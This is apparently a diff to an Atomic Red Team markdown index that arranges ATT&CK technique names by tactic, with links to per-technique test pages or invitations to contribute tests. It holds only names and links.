-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
-| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Office Test](../../T1137.002/T1137.002.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
-| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
-| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
-| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
-| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
-| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
-| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
-| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
-| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
-| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
-| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
-| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
-| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
-| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
-| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Windows Service](../../T1543.003/T1543.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
